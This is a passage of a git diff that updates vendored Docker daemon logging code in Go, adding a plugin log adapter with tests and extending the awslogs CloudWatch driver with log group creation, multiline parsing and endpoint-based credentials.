 	"crypto/tls"
diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_linux.go b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go
index ad343c1e8e..6ddcd2fc8d 100644
--- a/vendor/github.com/docker/docker/daemon/logdrivers_linux.go
+++ b/vendor/github.com/docker/docker/daemon/logdrivers_linux.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	// Importing packages here only to make sure their init gets called and
diff --git a/vendor/github.com/docker/docker/daemon/logdrivers_windows.go b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go
index f3002b97e2..62e7a6f95b 100644
--- a/vendor/github.com/docker/docker/daemon/logdrivers_windows.go
+++ b/vendor/github.com/docker/docker/daemon/logdrivers_windows.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	// Importing packages here only to make sure their init gets called and
@@ -6,6 +6,7 @@ import (
 	_ "github.com/docker/docker/daemon/logger/awslogs"
 	_ "github.com/docker/docker/daemon/logger/etwlogs"
 	_ "github.com/docker/docker/daemon/logger/fluentd"
+	_ "github.com/docker/docker/daemon/logger/gelf"
 	_ "github.com/docker/docker/daemon/logger/jsonfilelog"
 	_ "github.com/docker/docker/daemon/logger/logentries"
 	_ "github.com/docker/docker/daemon/logger/splunk"
diff --git a/vendor/github.com/docker/docker/daemon/logger/adapter.go b/vendor/github.com/docker/docker/daemon/logger/adapter.go
new file mode 100644
index 0000000000..95aff9bf3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/adapter.go
@@ -0,0 +1,139 @@
+package logger // import "github.com/docker/docker/daemon/logger"
+
+import (
+	"io"
+	"os"
+	"path/filepath"
+	"sync"
+	"time"
+
+	"github.com/docker/docker/api/types/plugins/logdriver"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+// pluginAdapter takes a plugin and implements the Logger interface for logger
+// instances
+type pluginAdapter struct {
+	driverName   string
+	id           string
+	plugin       logPlugin
+	fifoPath     string
+	capabilities Capability
+	logInfo      Info
+
+	// synchronize access to the log stream and shared buffer
+	mu     sync.Mutex
+	enc    logdriver.LogEntryEncoder
+	stream io.WriteCloser
+	// buf is shared for each `Log()` call to reduce allocations.
+	// buf must be protected by mutex
+	buf logdriver.LogEntry
+}
+
+func (a *pluginAdapter) Log(msg *Message) error {
+	a.mu.Lock()
+
+	a.buf.Line = msg.Line
+	a.buf.TimeNano = msg.Timestamp.UnixNano()
+	a.buf.Partial = msg.PLogMetaData != nil
+	a.buf.Source = msg.Source
+
+	err := a.enc.Encode(&a.buf)
+	a.buf.Reset()
+
+	a.mu.Unlock()
+
+	PutMessage(msg)
+	return err
+}
+
+func (a *pluginAdapter) Name() string {
+	return a.driverName
+}
+
+func (a *pluginAdapter) Close() error {
+	a.mu.Lock()
+	defer a.mu.Unlock()
+
+	if err := a.plugin.StopLogging(filepath.Join("/", "run", "docker", "logging", a.id)); err != nil {
+		return err
+	}
+
+	if err := a.stream.Close(); err != nil {
+		logrus.WithError(err).Error("error closing plugin fifo")
+	}
+	if err := os.Remove(a.fifoPath); err != nil && !os.IsNotExist(err) {
+		logrus.WithError(err).Error("error cleaning up plugin fifo")
+	}
+
+	// may be nil, especially for unit tests
+	if pluginGetter != nil {
+		pluginGetter.Get(a.Name(), extName, plugingetter.Release)
+	}
+	return nil
+}
+
+type pluginAdapterWithRead struct {
+	*pluginAdapter
+}
+
+func (a *pluginAdapterWithRead) ReadLogs(config ReadConfig) *LogWatcher {
+	watcher := NewLogWatcher()
+
+	go func() {
+		defer close(watcher.Msg)
+		stream, err := a.plugin.ReadLogs(a.logInfo, config)
+		if err != nil {
+			watcher.Err <- errors.Wrap(err, "error getting log reader")
+			return
+		}
+		defer stream.Close()
+
+		dec := logdriver.NewLogEntryDecoder(stream)
+		for {
+			select {
+			case <-watcher.WatchClose():
+				return
+			default:
+			}
+
+			var buf logdriver.LogEntry
+			if err := dec.Decode(&buf); err != nil {
+				if err == io.EOF {
+					return
+				}
+				select {
+				case watcher.Err <- errors.Wrap(err, "error decoding log message"):
+				case <-watcher.WatchClose():
+				}
+				return
+			}
+
+			msg := &Message{
+				Timestamp: time.Unix(0, buf.TimeNano),
+				Line:      buf.Line,
+				Source:    buf.Source,
+			}
+
+			// plugin should handle this, but check just in case
+			if !config.Since.IsZero() && msg.Timestamp.Before(config.Since) {
+				continue
+			}
+			if !config.Until.IsZero() && msg.Timestamp.After(config.Until) {
+				return
+			}
+
+			select {
+			case watcher.Msg <- msg:
+			case <-watcher.WatchClose():
+				// make sure the message we consumed is sent
+				watcher.Msg <- msg
+				return
+			}
+		}
+	}()
+
+	return watcher
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/adapter_test.go b/vendor/github.com/docker/docker/daemon/logger/adapter_test.go
new file mode 100644
index 0000000000..f47e711c89
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/adapter_test.go
@@ -0,0 +1,216 @@
+package logger // import "github.com/docker/docker/daemon/logger"
+
+import (
+	"encoding/binary"
+	"io"
+	"sync"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types/plugins/logdriver"
+	protoio "github.com/gogo/protobuf/io"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+// mockLoggingPlugin implements the loggingPlugin interface for testing purposes
+// it only supports a single log stream
+type mockLoggingPlugin struct {
+	io.WriteCloser
+	inStream io.Reader
+	logs     []*logdriver.LogEntry
+	c        *sync.Cond
+	err      error
+}
+
+func newMockLoggingPlugin() *mockLoggingPlugin {
+	r, w := io.Pipe()
+	return &mockLoggingPlugin{
+		WriteCloser: w,
+		inStream:    r,
+		logs:        []*logdriver.LogEntry{},
+		c:           sync.NewCond(new(sync.Mutex)),
+	}
+}
+
+func (l *mockLoggingPlugin) StartLogging(file string, info Info) error {
+	go func() {
+		dec := protoio.NewUint32DelimitedReader(l.inStream, binary.BigEndian, 1e6)
+		for {
+			var msg logdriver.LogEntry
+			if err := dec.ReadMsg(&msg); err != nil {
+				l.c.L.Lock()
+				if l.err == nil {
+					l.err = err
+				}
+				l.c.L.Unlock()
+
+				l.c.Broadcast()
+				return
+
+			}
+
+			l.c.L.Lock()
+			l.logs = append(l.logs, &msg)
+			l.c.L.Unlock()
+			l.c.Broadcast()
+		}
+
+	}()
+	return nil
+}
+
+func (l *mockLoggingPlugin) StopLogging(file string) error {
+	l.c.L.Lock()
+	if l.err == nil {
+		l.err = io.EOF
+	}
+	l.c.L.Unlock()
+	l.c.Broadcast()
+	return nil
+}
+
+func (l *mockLoggingPlugin) Capabilities() (cap Capability, err error) {
+	return Capability{ReadLogs: true}, nil
+}
+
+func (l *mockLoggingPlugin) ReadLogs(info Info, config ReadConfig) (io.ReadCloser, error) {
+	r, w := io.Pipe()
+
+	go func() {
+		var idx int
+		enc := logdriver.NewLogEntryEncoder(w)
+
+		l.c.L.Lock()
+		defer l.c.L.Unlock()
+		for {
+			if l.err != nil {
+				w.Close()
+				return
+			}
+
+			if idx >= len(l.logs) {
+				if !config.Follow {
+					w.Close()
+					return
+				}
+
+				l.c.Wait()
+				continue
+			}
+
+			if err := enc.Encode(l.logs[idx]); err != nil {
+				w.CloseWithError(err)
+				return
+			}
+			idx++
+		}
+	}()
+
+	return r, nil
+}
+
+func (l *mockLoggingPlugin) waitLen(i int) {
+	l.c.L.Lock()
+	defer l.c.L.Unlock()
+	for len(l.logs) < i {
+		l.c.Wait()
+	}
+}
+
+func (l *mockLoggingPlugin) check(t *testing.T) {
+	if l.err != nil && l.err != io.EOF {
+		t.Fatal(l.err)
+	}
+}
+
+func newMockPluginAdapter(plugin *mockLoggingPlugin) Logger {
+	enc := logdriver.NewLogEntryEncoder(plugin)
+	a := &pluginAdapterWithRead{
+		&pluginAdapter{
+			plugin: plugin,
+			stream: plugin,
+			enc:    enc,
+		},
+	}
+	a.plugin.StartLogging("", Info{})
+	return a
+}
+
+func TestAdapterReadLogs(t *testing.T) {
+	plugin := newMockLoggingPlugin()
+	l := newMockPluginAdapter(plugin)
+
+	testMsg := []Message{
+		{Line: []byte("Are you the keymaker?"), Timestamp: time.Now()},
+		{Line: []byte("Follow the white rabbit"), Timestamp: time.Now()},
+	}
+	for _, msg := range testMsg {
+		m := msg.copy()
+		assert.Check(t, l.Log(m))
+	}
+
+	// Wait until messages are read into plugin
+	plugin.waitLen(len(testMsg))
+
+	lr, ok := l.(LogReader)
+	assert.Check(t, ok, "Logger does not implement LogReader")
+
+	lw := lr.ReadLogs(ReadConfig{})
+
+	for _, x := range testMsg {
+		select {
+		case msg := <-lw.Msg:
+			testMessageEqual(t, &x, msg)
+		case <-time.After(10 * time.Second):
+			t.Fatal("timeout reading logs")
+		}
+	}
+
+	select {
+	case _, ok := <-lw.Msg:
+		assert.Check(t, !ok, "expected message channel to be closed")
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for message channel to close")
+
+	}
+	lw.Close()
+
+	lw = lr.ReadLogs(ReadConfig{Follow: true})
+	for _, x := range testMsg {
+		select {
+		case msg := <-lw.Msg:
+			testMessageEqual(t, &x, msg)
+		case <-time.After(10 * time.Second):
+			t.Fatal("timeout reading logs")
+		}
+	}
+
+	x := Message{Line: []byte("Too infinity and beyond!"), Timestamp: time.Now()}
+	assert.Check(t, l.Log(x.copy()))
+
+	select {
+	case msg, ok := <-lw.Msg:
+		assert.Check(t, ok, "message channel unexpectedly closed")
+		testMessageEqual(t, &x, msg)
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout reading logs")
+	}
+
+	l.Close()
+	select {
+	case msg, ok := <-lw.Msg:
+		assert.Check(t, !ok, "expected message channel to be closed")
+		assert.Check(t, is.Nil(msg))
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for logger to close")
+	}
+
+	plugin.check(t)
+}
+
+func testMessageEqual(t *testing.T, a, b *Message) {
+	assert.Check(t, is.DeepEqual(a.Line, b.Line))
+	assert.Check(t, is.DeepEqual(a.Timestamp.UnixNano(), b.Timestamp.UnixNano()))
+	assert.Check(t, is.Equal(a.Source, b.Source))
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go
index fee518db4b..3d6466f09d 100644
--- a/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go
+++ b/vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go
@@ -1,19 +1,20 @@
 // Package awslogs provides the logdriver for forwarding container logs to Amazon CloudWatch Logs
-package awslogs
+package awslogs // import "github.com/docker/docker/daemon/logger/awslogs"
 
 import (
-	"errors"
 	"fmt"
 	"os"
+	"regexp"
 	"runtime"
 	"sort"
+	"strconv"
 	"strings"
 	"sync"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/aws/aws-sdk-go/aws"
 	"github.com/aws/aws-sdk-go/aws/awserr"
+	"github.com/aws/aws-sdk-go/aws/credentials/endpointcreds"
 	"github.com/aws/aws-sdk-go/aws/ec2metadata"
 	"github.com/aws/aws-sdk-go/aws/request"
 	"github.com/aws/aws-sdk-go/aws/session"
@@ -21,16 +22,22 @@ import (
 	"github.com/docker/docker/daemon/logger"
 	"github.com/docker/docker/daemon/logger/loggerutils"
 	"github.com/docker/docker/dockerversion"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 const (
-	name                  = "awslogs"
-	regionKey             = "awslogs-region"
-	regionEnvKey          = "AWS_REGION"
-	logGroupKey           = "awslogs-group"
-	logStreamKey          = "awslogs-stream"
-	tagKey                = "tag"
-	batchPublishFrequency = 5 * time.Second
+	name                   = "awslogs"
+	regionKey              = "awslogs-region"
+	regionEnvKey           = "AWS_REGION"
+	logGroupKey            = "awslogs-group"
+	logStreamKey           = "awslogs-stream"
+	logCreateGroupKey      = "awslogs-create-group"
+	tagKey                 = "tag"
+	datetimeFormatKey      = "awslogs-datetime-format"
+	multilinePatternKey    = "awslogs-multiline-pattern"
+	credentialsEndpointKey = "awslogs-credentials-endpoint"
+	batchPublishFrequency  = 5 * time.Second
 
 	// See: http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html
 	perEventBytes          = 26
@@ -43,21 +50,30 @@ const (
 	resourceAlreadyExistsCode = "ResourceAlreadyExistsException"
 	dataAlreadyAcceptedCode   = "DataAlreadyAcceptedException"
 	invalidSequenceTokenCode  = "InvalidSequenceTokenException"
+	resourceNotFoundCode      = "ResourceNotFoundException"
+
+	credentialsEndpoint = "http://169.254.170.2"
 
 	userAgentHeader = "User-Agent"
 )
 
 type logStream struct {
-	logStreamName string
-	logGroupName  string
-	client        api
-	messages      chan *logger.Message
-	lock          sync.RWMutex
-	closed        bool
-	sequenceToken *string
+	logStreamName    string
+	logGroupName     string
+	logCreateGroup   bool
+	logNonBlocking   bool
+	multilinePattern *regexp.Regexp
+	client           api
+	messages         chan *logger.Message
+	lock             sync.RWMutex
+	closed           bool
+	sequenceToken    *string
 }
 
+var _ logger.SizedLogger = &logStream{}
+
 type api interface {
+	CreateLogGroup(*cloudwatchlogs.CreateLogGroupInput) (*cloudwatchlogs.CreateLogGroupOutput, error)
 	CreateLogStream(*cloudwatchlogs.CreateLogStreamInput) (*cloudwatchlogs.CreateLogStreamOutput, error)
 	PutLogEvents(*cloudwatchlogs.PutLogEventsInput) (*cloudwatchlogs.PutLogEventsOutput, error)
 }
@@ -82,58 +98,176 @@ func init() {
 	}
 }
 
+// eventBatch holds the events that are batched for submission and the
+// associated data about it.
+//
+// Warning: this type is not threadsafe and must not be used
+// concurrently. This type is expected to be consumed in a single go
+// routine and never concurrently.
+type eventBatch struct {
+	batch []wrappedEvent
+	bytes int
+}
+
 // New creates an awslogs logger using the configuration passed in on the
 // context.  Supported context configuration variables are awslogs-region,
-// awslogs-group, and awslogs-stream.  When available, configuration is
+// awslogs-group, awslogs-stream, awslogs-create-group, awslogs-multiline-pattern
+// and awslogs-datetime-format.  When available, configuration is
 // also taken from environment variables AWS_REGION, AWS_ACCESS_KEY_ID,
 // AWS_SECRET_ACCESS_KEY, the shared credentials file (~/.aws/credentials), and
 // the EC2 Instance Metadata Service.
-func New(ctx logger.Context) (logger.Logger, error) {
-	logGroupName := ctx.Config[logGroupKey]
-	logStreamName, err := loggerutils.ParseLogTag(ctx, "{{.FullID}}")
+func New(info logger.Info) (logger.Logger, error) {
+	logGroupName := info.Config[logGroupKey]
+	logStreamName, err := loggerutils.ParseLogTag(info, "{{.FullID}}")
 	if err != nil {
 		return nil, err
 	}
+	logCreateGroup := false
+	if info.Config[logCreateGroupKey] != "" {
+		logCreateGroup, err = strconv.ParseBool(info.Config[logCreateGroupKey])
+		if err != nil {
+			return nil, err
+		}
+	}
 
-	if ctx.Config[logStreamKey] != "" {
-		logStreamName = ctx.Config[logStreamKey]
+	logNonBlocking := info.Config["mode"] == "non-blocking"
+
+	if info.Config[logStreamKey] != "" {
+		logStreamName = info.Config[logStreamKey]
 	}
-	client, err := newAWSLogsClient(ctx)
+
+	multilinePattern, err := parseMultilineOptions(info)
 	if err != nil {
 		return nil, err
 	}
-	containerStream := &logStream{
-		logStreamName: logStreamName,
-		logGroupName:  logGroupName,
-		client:        client,
-		messages:      make(chan *logger.Message, 4096),
-	}
-	err = containerStream.create()
+
+	client, err := newAWSLogsClient(info)
 	if err != nil {
 		return nil, err
 	}
-	go containerStream.collectBatch()
+
+	containerStream := &logStream{
+		logStreamName:    logStreamName,
+		logGroupName:     logGroupName,
+		logCreateGroup:   logCreateGroup,
+		logNonBlocking:   logNonBlocking,
+		multilinePattern: multilinePattern,
+		client:           client,
+		messages:         make(chan *logger.Message, 4096),
+	}
+
+	creationDone := make(chan bool)
+	if logNonBlocking {
+		go func() {
+			backoff := 1
+			maxBackoff := 32
+			for {
+				// If logger is closed we are done
+				containerStream.lock.RLock()
+				if containerStream.closed {
+					containerStream.lock.RUnlock()
+					break
+				}
+				containerStream.lock.RUnlock()
+				err := containerStream.create()
+				if err == nil {
+					break
+				}
+
+				time.Sleep(time.Duration(backoff) * time.Second)
+				if backoff < maxBackoff {
+					backoff *= 2
+				}
+				logrus.
+					WithError(err).
+					WithField("container-id", info.ContainerID).
+					WithField("container-name", info.ContainerName).
+					Error("Error while trying to initialize awslogs. Retrying in: ", backoff, " seconds")
+			}
+			close(creationDone)
+		}()
+	} else {
+		if err = containerStream.create(); err != nil {
+			return nil, err
+		}
+		close(creationDone)
+	}
+	go containerStream.collectBatch(creationDone)
 
 	return containerStream, nil
 }
 
+// Parses awslogs-multiline-pattern and awslogs-datetime-format options
+// If awslogs-datetime-format is present, convert the format from strftime
+// to regexp and return.
+// If awslogs-multiline-pattern is present, compile regexp and return
+func parseMultilineOptions(info logger.Info) (*regexp.Regexp, error) {
+	dateTimeFormat := info.Config[datetimeFormatKey]
+	multilinePatternKey := info.Config[multilinePatternKey]
+	// strftime input is parsed into a regular expression
+	if dateTimeFormat != "" {
+		// %. matches each strftime format sequence and ReplaceAllStringFunc
+		// looks up each format sequence in the conversion table strftimeToRegex
+		// to replace with a defined regular expression
+		r := regexp.MustCompile("%.")
+		multilinePatternKey = r.ReplaceAllStringFunc(dateTimeFormat, func(s string) string {
+			return strftimeToRegex[s]
+		})
+	}
+	if multilinePatternKey != "" {
+		multilinePattern, err := regexp.Compile(multilinePatternKey)
+		if err != nil {
+			return nil, errors.Wrapf(err, "awslogs could not parse multiline pattern key %q", multilinePatternKey)
+		}
+		return multilinePattern, nil
+	}
+	return nil, nil
+}
+
+// Maps strftime format strings to regex
+var strftimeToRegex = map[string]string{
+	/*weekdayShort          */ `%a`: `(?:Mon|Tue|Wed|Thu|Fri|Sat|Sun)`,
+	/*weekdayFull           */ `%A`: `(?:Monday|Tuesday|Wednesday|Thursday|Friday|Saturday|Sunday)`,
+	/*weekdayZeroIndex      */ `%w`: `[0-6]`,
+	/*dayZeroPadded         */ `%d`: `(?:0[1-9]|[1,2][0-9]|3[0,1])`,
+	/*monthShort            */ `%b`: `(?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)`,
+	/*monthFull             */ `%B`: `(?:January|February|March|April|May|June|July|August|September|October|November|December)`,
+	/*monthZeroPadded       */ `%m`: `(?:0[1-9]|1[0-2])`,
+	/*yearCentury           */ `%Y`: `\d{4}`,
+	/*yearZeroPadded        */ `%y`: `\d{2}`,
+	/*hour24ZeroPadded      */ `%H`: `(?:[0,1][0-9]|2[0-3])`,
+	/*hour12ZeroPadded      */ `%I`: `(?:0[0-9]|1[0-2])`,
+	/*AM or PM              */ `%p`: "[A,P]M",
+	/*minuteZeroPadded      */ `%M`: `[0-5][0-9]`,
+	/*secondZeroPadded      */ `%S`: `[0-5][0-9]`,
+	/*microsecondZeroPadded */ `%f`: `\d{6}`,
+	/*utcOffset             */ `%z`: `[+-]\d{4}`,
+	/*tzName                */ `%Z`: `[A-Z]{1,4}T`,
+	/*dayOfYearZeroPadded   */ `%j`: `(?:0[0-9][1-9]|[1,2][0-9][0-9]|3[0-5][0-9]|36[0-6])`,
+	/*milliseconds          */ `%L`: `\.\d{3}`,
+}
+
 // newRegionFinder is a variable such that the implementation
 // can be swapped out for unit tests.
 var newRegionFinder = func() regionFinder {
 	return ec2metadata.New(session.New())
 }
 
+// newSDKEndpoint is a variable such that the implementation
+// can be swapped out for unit tests.
+var newSDKEndpoint = credentialsEndpoint
+
 // newAWSLogsClient creates the service client for Amazon CloudWatch Logs.
 // Customizations to the default client from the SDK include a Docker-specific
 // User-Agent string and automatic region detection using the EC2 Instance
 // Metadata Service when region is otherwise unspecified.
-func newAWSLogsClient(ctx logger.Context) (api, error) {
+func newAWSLogsClient(info logger.Info) (api, error) {
 	var region *string
 	if os.Getenv(regionEnvKey) != "" {
 		region = aws.String(os.Getenv(regionEnvKey))
 	}
-	if ctx.Config[regionKey] != "" {
-		region = aws.String(ctx.Config[regionKey])
+	if info.Config[regionKey] != "" {
+		region = aws.String(info.Config[regionKey])
 	}
 	if region == nil || *region == "" {
 		logrus.Info("Trying to get region from EC2 Metadata")
@@ -147,11 +281,33 @@ func newAWSLogsClient(ctx logger.Context) (api, error) {
 		}
 		region = &r
 	}
+
+	sess, err := session.NewSession()
+	if err != nil {
+		return nil, errors.New("Failed to create a service client session for for awslogs driver")
+	}
+
+	// attach region to cloudwatchlogs config
+	sess.Config.Region = region
+
+	if uri, ok := info.Config[credentialsEndpointKey]; ok {
+		logrus.Debugf("Trying to get credentials from awslogs-credentials-endpoint")
+
+		endpoint := fmt.Sprintf("%s%s", newSDKEndpoint, uri)
+		creds := endpointcreds.NewCredentialsClient(*sess.Config, sess.Handlers, endpoint,
+			func(p *endpointcreds.Provider) {
+				p.ExpiryWindow = 5 * time.Minute
+			})
+
+		// attach credentials to cloudwatchlogs config
+		sess.Config.Credentials = creds
+	}
+
 	logrus.WithFields(logrus.Fields{
 		"region": *region,
 	}).Debug("Created awslogs client")
 
-	client := cloudwatchlogs.New(session.New(), aws.NewConfig().WithRegion(*region))
+	client := cloudwatchlogs.New(sess)
 
 	client.Handlers.Build.PushBackNamed(request.NamedHandler{
 		Name: "DockerUserAgentHandler",
@@ -170,14 +326,26 @@ func (l *logStream) Name() string {
 	return name
 }
 
+func (l *logStream) BufSize() int {
+	return maximumBytesPerEvent
+}
+
 // Log submits messages for logging by an instance of the awslogs logging driver
 func (l *logStream) Log(msg *logger.Message) error {
 	l.lock.RLock()
 	defer l.lock.RUnlock()
-	if !l.closed {
-		// buffer up the data, making sure to copy the Line data
-		l.messages <- logger.CopyMessage(msg)
+	if l.closed {
+		return errors.New("awslogs is closed")
 	}
+	if l.logNonBlocking {
+		select {
+		case l.messages <- msg:
+			return nil
+		default:
+			return errors.New("awslogs buffer is full")
+		}
+	}
+	l.messages <- msg
 	return nil
 }
 
@@ -192,8 +360,52 @@ func (l *logStream) Close() error {
 	return nil
 }
 
-// create creates a log stream for the instance of the awslogs logging driver
+// create creates log group and log stream for the instance of the awslogs logging driver
 func (l *logStream) create() error {
+	if err := l.createLogStream(); err != nil {
+		if l.logCreateGroup {
+			if awsErr, ok := err.(awserr.Error); ok && awsErr.Code() == resourceNotFoundCode {
+				if err := l.createLogGroup(); err != nil {
+					return err
+				}
+				return l.createLogStream()
+			}
+		}
+		if err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+// createLogGroup creates a log group for the instance of the awslogs logging driver
+func (l *logStream) createLogGroup() error {
+	if _, err := l.client.CreateLogGroup(&cloudwatchlogs.CreateLogGroupInput{
+		LogGroupName: aws.String(l.logGroupName),
+	}); err != nil {
+		if awsErr, ok := err.(awserr.Error); ok {
+			fields := logrus.Fields{
+				"errorCode":      awsErr.Code(),
+				"message":        awsErr.Message(),
+				"origError":      awsErr.OrigErr(),
+				"logGroupName":   l.logGroupName,
+				"logCreateGroup": l.logCreateGroup,
+			}
+			if awsErr.Code() == resourceAlreadyExistsCode {
+				// Allow creation to succeed
+				logrus.WithFields(fields).Info("Log group already exists")
+				return nil
+			}
+			logrus.WithFields(fields).Error("Failed to create log group")
+		}
+		return err
+	}
+	return nil
+}
+
+// createLogStream creates a log stream for the instance of the awslogs logging driver
+func (l *logStream) createLogStream() error {
 	input := &cloudwatchlogs.CreateLogStreamInput{
 		LogGroupName:  aws.String(l.logGroupName),
 		LogStreamName: aws.String(l.logStreamName),
@@ -228,71 +440,117 @@ var newTicker = func(freq time.Duration) *time.Ticker {
 }
 
 // collectBatch executes as a goroutine to perform batching of log events for
-// submission to the log stream.  Batching is performed on time- and size-
-// bases.  Time-based batching occurs at a 5 second interval (defined in the
-// batchPublishFrequency const).  Size-based batching is performed on the
-// maximum number of events per batch (defined in maximumLogEventsPerPut) and
-// the maximum number of total bytes in a batch (defined in
-// maximumBytesPerPut).  Log messages are split by the maximum bytes per event
-// (defined in maximumBytesPerEvent).  There is a fixed per-event byte overhead
-// (defined in perEventBytes) which is accounted for in split- and batch-
-// calculations.
-func (l *logStream) collectBatch() {
-	timer := newTicker(batchPublishFrequency)
-	var events []wrappedEvent
-	bytes := 0
+// submission to the log stream.  If the awslogs-multiline-pattern or
+// awslogs-datetime-format options have been configured, multiline processing
+// is enabled, where log messages are stored in an event buffer until a multiline
+// pattern match is found, at which point the messages in the event buffer are
+// pushed to CloudWatch logs as a single log event.  Multiline messages are processed
+// according to the maximumBytesPerPut constraint, and the implementation only
+// allows for messages to be buffered for a maximum of 2*batchPublishFrequency
+// seconds.  When events are ready to be processed for submission to CloudWatch
+// Logs, the processEvents method is called.  If a multiline pattern is not
+// configured, log events are submitted to the processEvents method immediately.
+func (l *logStream) collectBatch(created chan bool) {
+	// Wait for the logstream/group to be created
+	<-created
+	ticker := newTicker(batchPublishFrequency)
+	var eventBuffer []byte
+	var eventBufferTimestamp int64
+	var batch = newEventBatch()
 	for {
 		select {
-		case <-timer.C:
-			l.publishBatch(events)
-			events = events[:0]
-			bytes = 0
+		case t := <-ticker.C:
+			// If event buffer is older than batch publish frequency flush the event buffer
+			if eventBufferTimestamp > 0 && len(eventBuffer) > 0 {
+				eventBufferAge := t.UnixNano()/int64(time.Millisecond) - eventBufferTimestamp
+				eventBufferExpired := eventBufferAge >= int64(batchPublishFrequency)/int64(time.Millisecond)
+				eventBufferNegative := eventBufferAge < 0
+				if eventBufferExpired || eventBufferNegative {
+					l.processEvent(batch, eventBuffer, eventBufferTimestamp)
+					eventBuffer = eventBuffer[:0]
+				}
+			}
+			l.publishBatch(batch)
+			batch.reset()
 		case msg, more := <-l.messages:
 			if !more {
-				l.publishBatch(events)
+				// Flush event buffer and release resources
+				l.processEvent(batch, eventBuffer, eventBufferTimestamp)
+				eventBuffer = eventBuffer[:0]
+				l.publishBatch(batch)
+				batch.reset()
 				return
 			}
-			unprocessedLine := msg.Line
-			for len(unprocessedLine) > 0 {
-				// Split line length so it does not exceed the maximum
-				lineBytes := len(unprocessedLine)
-				if lineBytes > maximumBytesPerEvent {
-					lineBytes = maximumBytesPerEvent
+			if eventBufferTimestamp == 0 {
+				eventBufferTimestamp = msg.Timestamp.UnixNano() / int64(time.Millisecond)
+			}
+			line := msg.Line
+			if l.multilinePattern != nil {
+				if l.multilinePattern.Match(line) || len(eventBuffer)+len(line) > maximumBytesPerEvent {
+					// This is a new log event or we will exceed max bytes per event
+					// so flush the current eventBuffer to events and reset timestamp
+					l.processEvent(batch, eventBuffer, eventBufferTimestamp)
+					eventBufferTimestamp = msg.Timestamp.UnixNano() / int64(time.Millisecond)
+					eventBuffer = eventBuffer[:0]
 				}
-				line := unprocessedLine[:lineBytes]
-				unprocessedLine = unprocessedLine[lineBytes:]
-				if (len(events) >= maximumLogEventsPerPut) || (bytes+lineBytes+perEventBytes > maximumBytesPerPut) {
-					// Publish an existing batch if it's already over the maximum number of events or if adding this
-					// event would push it over the maximum number of total bytes.
-					l.publishBatch(events)
-					events = events[:0]
-					bytes = 0
+				// Append new line if event is less than max event size
+				if len(line) < maximumBytesPerEvent {
+					line = append(line, "\n"...)
 				}
-				events = append(events, wrappedEvent{
-					inputLogEvent: &cloudwatchlogs.InputLogEvent{
-						Message:   aws.String(string(line)),
-						Timestamp: aws.Int64(msg.Timestamp.UnixNano() / int64(time.Millisecond)),
-					},
-					insertOrder: len(events),
-				})
-				bytes += (lineBytes + perEventBytes)
+				eventBuffer = append(eventBuffer, line...)
+				logger.PutMessage(msg)
+			} else {
+				l.processEvent(batch, line, msg.Timestamp.UnixNano()/int64(time.Millisecond))
+				logger.PutMessage(msg)
 			}
 		}
 	}
 }
 
+// processEvent processes log events that are ready for submission to CloudWatch
+// logs.  Batching is performed on time- and size-bases.  Time-based batching
+// occurs at a 5 second interval (defined in the batchPublishFrequency const).
+// Size-based batching is performed on the maximum number of events per batch
+// (defined in maximumLogEventsPerPut) and the maximum number of total bytes in a
+// batch (defined in maximumBytesPerPut).  Log messages are split by the maximum
+// bytes per event (defined in maximumBytesPerEvent).  There is a fixed per-event
+// byte overhead (defined in perEventBytes) which is accounted for in split- and
+// batch-calculations.
+func (l *logStream) processEvent(batch *eventBatch, events []byte, timestamp int64) {
+	for len(events) > 0 {
+		// Split line length so it does not exceed the maximum
+		lineBytes := len(events)
+		if lineBytes > maximumBytesPerEvent {
+			lineBytes = maximumBytesPerEvent
+		}
+		line := events[:lineBytes]
+
+		event := wrappedEvent{
+			inputLogEvent: &cloudwatchlogs.InputLogEvent{
+				Message:   aws.String(string(line)),
+				Timestamp: aws.Int64(timestamp),
+			},
+			insertOrder: batch.count(),
+		}
+
+		added := batch.add(event, lineBytes)
+		if added {
+			events = events[lineBytes:]
+		} else {
+			l.publishBatch(batch)
+			batch.reset()
+		}
+	}
+}
+
 // publishBatch calls PutLogEvents for a given set of InputLogEvents,
 // accounting for sequencing requirements (each request must reference the
 // sequence token returned by the previous request).
-func (l *logStream) publishBatch(events []wrappedEvent) {
-	if len(events) == 0 {
+func (l *logStream) publishBatch(batch *eventBatch) {
+	if batch.isEmpty() {
 		return
 	}
-
-	// events in a batch must be sorted by timestamp
-	// see http://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutLogEvents.html
-	sort.Sort(byTimestamp(events))
-	cwEvents := unwrapEvents(events)
+	cwEvents := unwrapEvents(batch.events())
 
 	nextSequenceToken, err := l.putLogEvents(cwEvents, l.sequenceToken)
 
@@ -349,14 +607,19 @@ func (l *logStream) putLogEvents(events []*cloudwatchlogs.InputLogEvent, sequenc
 }
 
 // ValidateLogOpt looks for awslogs-specific log options awslogs-region,
-// awslogs-group, and awslogs-stream
